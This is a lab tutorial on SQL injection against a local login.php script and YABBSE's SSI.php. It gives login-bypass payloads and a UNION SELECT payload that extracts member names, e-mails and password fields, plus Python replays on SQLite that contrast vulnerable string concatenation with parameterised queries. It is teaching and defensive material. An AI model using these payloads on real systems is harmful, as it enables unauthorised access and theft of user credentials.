SQL Injection Attacks Tutorial

I. Manipulating login.php Script
[01] Open a terminal and type the following (without the prompt symbols):

$ su -
# sql_tutorial_start

These commands will start all needed services in the background.

[02] Open the browser and check http://localhost/phpmyadmin/.

Have a look at the database userdb that our login.php script is accessing.

[04] Have a look at the login.php script. To do this, open another terminal and type:

$ vi login.php

or, in case you are not familiar with the vi text editor, you can use the more user-friendly mcedit (or any other editor you wish):

$ mcedit login.php

[05] If you want to see the query the script submits, remove the two leading slashes that comment out the line beginning with echo "$query", so the query is printed with every login attempt:

[06] Now open the browser again and go to http://localhost/login.php. You will see a page similar to the one below:

[07] Enter the username admin, which we know exists. As you can see, we cannot log in because the password is missing.

[08] Now append a ' to the username to see whether the script is vulnerable. The script returns a database error, which shows that the quote reached the SQL parser unescaped, so we can move on.

[09] Enter admin' OR 1=1 as username and see what happens.

[10] From the echoed query we can see that the single quote that used to close the username literal now dangles after 1=1 with nothing to pair with, so the statement is malformed.

[11] Enter admin' OR 1='1 as username (the quote goes right after admin). Now every quote is paired, the query is valid and we're in: the condition reads username = 'admin' OR (1='1' AND password = ''), and since AND binds tighter than OR, the admin row matches whatever the password is:

[12] To take the attack further you can use /* to comment out everything that follows. Enter admin' /* as username and check the query:

SELECT * FROM `userlist` WHERE `username` = 'admin' /*' AND `password` = ''

is what the script sends, but the database treats everything after /* as a comment, so only the part before it is processed. The password check is gone and the statement is valid. On MySQL the line comment styles # and -- (followed by a space) do the same job.
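The whole first part replayed in Python against an in-memory SQLite database, as an added example that is not the tutorial's login.php. The userlist rows and the admin password are made up, and SQLite stands in for MySQL (it, too, treats an unterminated /* as a comment running to the end of the input). build_query() concatenates the input exactly the way the script does; safe_login() is the parameterised form that the same payloads cannot bypass:

```python
import sqlite3

# Constructed stand-in for the tutorial's userdb.userlist table; the rows and
# the admin password are made up for this demo, and SQLite replaces MySQL.
SEED_ROWS = [("admin", "s3cret-admin-pw"), ("alice", "alice-pw")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE `userlist` (`username` TEXT, `password` TEXT)")
    conn.executemany("INSERT INTO `userlist` VALUES (?, ?)", SEED_ROWS)
    return conn


def build_query(username, password):
    # The same string concatenation login.php does: user input becomes SQL text.
    return ("SELECT * FROM `userlist` WHERE `username` = '" + username
            + "' AND `password` = '" + password + "'")


def vulnerable_login(conn, username, password):
    """Run the concatenated query. Returns (outcome, query) where outcome is
    'ok:<user>', 'denied' or 'error:<db message>'."""
    query = build_query(username, password)
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.Error as e:  # the database error the probe in step [08] looks for
        return "error:" + str(e), query
    return ("ok:" + row[0]) if row else "denied", query


def safe_login(conn, username, password):
    # Parameterised query: the values travel separately from the statement text,
    # so a quote or /* in the input is compared as data, never parsed as SQL.
    row = conn.execute(
        "SELECT * FROM `userlist` WHERE `username` = ? AND `password` = ?",
        (username, password)).fetchone()
    return ("ok:" + row[0]) if row else "denied"


def run_tutorial_payloads():
    """Replay steps [07] to [12] with an empty password against both versions.
    Returns {payload: (kind of vulnerable outcome, safe outcome)}."""
    conn = make_db()
    payloads = ["admin", "admin'", "admin' OR 1=1", "admin' OR 1='1", "admin' /*"]
    results = {}
    for p in payloads:
        outcome, query = vulnerable_login(conn, p, "")
        results[p] = (outcome.split(":")[0], safe_login(conn, p, ""))
        print(f"{p!r:20} vulnerable: {outcome}")
        print(f"{'':20} safe:       {results[p][1]}")
        print(f"{'':20} query:      {query}")
    return results


if __name__ == "__main__":
    run_tutorial_payloads()
```

Running it prints, for each payload, the query the vulnerable version builds and what each version answers: the two probes from [08] and [09] produce database errors, admin' OR 1='1 and admin' /* log in as admin with no password, and the parameterised version denies all of them.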


II. Manipulating YABBSE SSI.php Script
[01] We installed YABBSE under http://localhost/yabbse/. The vulnerable script is located at http://localhost/yabbse/SSI.php.

Open the script in a terminal by typing:

$ vi /yabbse/SSI.php

or use whichever editor you want. Now move to line 222, where the query we are trying to manipulate is located.

[03] To reach the function recentTopics, call http://localhost/yabbse/SSI.php?func...

[04] In this query the variable $ID_MEMBER is used directly. This is where we try to break in. Now go to http://localhost/yabbse/SSI.php?func..._MEMBER=1' (note the single quote at the end). This results in an error, so the script is potentially vulnerable to SQL injection.

[05] The error message tells us that the original query references a table alias lmr (yabbse_log_mark_read) which is missing from our version. We look up the original query in the editor and append the missing JOIN to our input.

[06] Go to http://localhost/yabbse/SSI.php?func...ics&ID_MEMBER= 1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1) UNION SELECT ID_MEMBER, memberName FROM yabbse_members /*. The error message now tells us that our UNION SELECT does not return the same number of columns as the original SELECT. A UNION only works when both sides have the same column count, so we have to pad ours with null values.

[07] Point your browser to http://localhost/yabbse/SSI.php?func...ics&ID_MEMBER= 1 OR 1=1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1 OR 1=1) UNION SELECT memberName, emailAddress, passwd, null, null, null, null, null, null, null, null, null FROM yabbse_members /*. Now we have a valid query, but only the e-mail address is visible in the output:

[08] Have a look at line 223 and below. The HTML output code there prints only some of the columns of the result. So what we have to do now is shuffle our columns and null placeholders so that the values we want land in the positions that are displayed.

[09] Go to http://localhost/yabbse/SSI.php?func...s&ID_MEMBER=1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1 OR 1=1) UNION SELECT null, memberName, null, emailAddress, null, passwd,null,null,null,null,null,null FROM yabbse_members /*. There we are: we have obtained all the information we wanted (member name, e-mail address and the passwd field):
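The UNION attack from steps [04] to [09] replayed in Python against SQLite, as an added example rather than YABBSE's own code. The query in recent_topics_sql() is not the real line 222 of SSI.php; it is a constructed reduction that keeps only what the payload relies on: twelve result columns, $ID_MEMBER pasted unquoted into two ON clauses, and trailing clauses for the /* to swallow. The table contents, the column positions the HTML output shows (1, 3 and 5, inferred from what became visible in [07] and [09]) and the hardened variant safe_run_recent_topics() are likewise assumptions of this example:

```python
import sqlite3

PREFIX = "yabbse_"


def make_db():
    # Constructed, cut-down stand-in for the YABBSE tables; rows are made up.
    conn = sqlite3.connect(":memory:")
    conn.executescript(f"""
        CREATE TABLE {PREFIX}topics (ID_TOPIC INTEGER, ID_BOARD INTEGER, subject TEXT,
                                    posterName TEXT, posterTime INTEGER, numReplies INTEGER);
        CREATE TABLE {PREFIX}log_topics (ID_TOPIC INTEGER, ID_MEMBER INTEGER, logTime INTEGER);
        CREATE TABLE {PREFIX}log_mark_read (ID_BOARD INTEGER, ID_MEMBER INTEGER, logTime INTEGER);
        CREATE TABLE {PREFIX}members (ID_MEMBER INTEGER, memberName TEXT,
                                     emailAddress TEXT, passwd TEXT);
        INSERT INTO {PREFIX}topics VALUES (1, 1, 'Welcome', 'admin', 1000, 3);
        INSERT INTO {PREFIX}log_topics VALUES (1, 1, 1001);
        INSERT INTO {PREFIX}log_mark_read VALUES (1, 1, 1002);
        INSERT INTO {PREFIX}members VALUES (1, 'admin', 'admin@example.test', 'hash-admin');
        INSERT INTO {PREFIX}members VALUES (2, 'bob', 'bob@example.test', 'hash-bob');
    """)
    return conn


def recent_topics_sql(id_member):
    # Hypothetical shape of the vulnerable query (not SSI.php's real text): the
    # value of $ID_MEMBER is interpolated as-is, twice, with no quotes around it.
    return ("SELECT t.posterTime, t.subject, t.ID_TOPIC, t.posterName, t.ID_BOARD, "
            "t.numReplies, lt.logTime, lmr.logTime, null, null, null, null "
            f"FROM {PREFIX}topics AS t "
            f"LEFT JOIN {PREFIX}log_topics AS lt "
            f"ON (lt.ID_TOPIC=t.ID_TOPIC AND lt.ID_MEMBER={id_member}) "
            f"LEFT JOIN {PREFIX}log_mark_read AS lmr "
            f"ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER={id_member}) "
            "ORDER BY t.posterTime DESC")


def render(rows):
    # Stand-in for the HTML output at line 223: only result positions 1, 3 and 5
    # are shown (assumed from which injected columns became visible in [07]/[09]).
    return [(r[1], r[3], r[5]) for r in rows]


def run_recent_topics(conn, id_member):
    """Vulnerable path. Returns ('ok', rendered rows) or ('error', db message)."""
    try:
        rows = conn.execute(recent_topics_sql(id_member)).fetchall()
    except sqlite3.Error as e:
        return "error", str(e)
    return "ok", render(rows)


def safe_run_recent_topics(conn, id_member):
    # Hardened path: the same statement with ? placeholders, the id bound twice
    # as data. A payload then merely fails to match a member row instead of
    # rewriting the query (casting to int first would be a second line of defence).
    rows = conn.execute(recent_topics_sql("?"), (id_member, id_member)).fetchall()
    return render(rows)


# Step [05]: the trailing /* swallows the original lmr join, but the SELECT list
# still refers to lmr, so the payload closes the lt ON clause and re-adds that join.
FIX_JOIN = (f"1) LEFT JOIN {PREFIX}log_mark_read AS lmr "
            "ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1)")

PAYLOADS = {
    # [04] probe: a stray quote breaks the statement
    "probe": "1'",
    # [06] two columns against twelve: the UNION is rejected
    "short": FIX_JOIN + f" UNION SELECT ID_MEMBER, memberName FROM {PREFIX}members /*",
    # [07] right column count, but only position 1 (the e-mail) lands on a shown slot
    "hidden": FIX_JOIN + " UNION SELECT memberName, emailAddress, passwd, null, null, null, "
              f"null, null, null, null, null, null FROM {PREFIX}members /*",
    # [09] nulls shuffled so name, e-mail and passwd sit on positions 1, 3 and 5
    "final": FIX_JOIN + " UNION SELECT null, memberName, null, emailAddress, null, passwd, "
             f"null, null, null, null, null, null FROM {PREFIX}members /*",
}


def demo():
    """Run every tutorial payload through the vulnerable path; return {name: result}."""
    conn = make_db()
    results = {name: run_recent_topics(conn, p) for name, p in PAYLOADS.items()}
    for name, (status, detail) in results.items():
        print(f"{name:7} {status}: {detail}")
    return results


if __name__ == "__main__":
    demo()
```

The probe and the two-column UNION fail at parse time, the twelve-column UNION with the members' data in the wrong slots shows only the e-mail, and the shuffled version shows name, e-mail and passwd for every member next to the genuine topic row. The same "final" payload bound as a parameter returns nothing but the topic row.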

[10] Return to the terminal opened at the beginning (or open a new one) and issue the commands:

$ su -
# sql_tutorial_stop

This will stop all the services used in this tutorial.
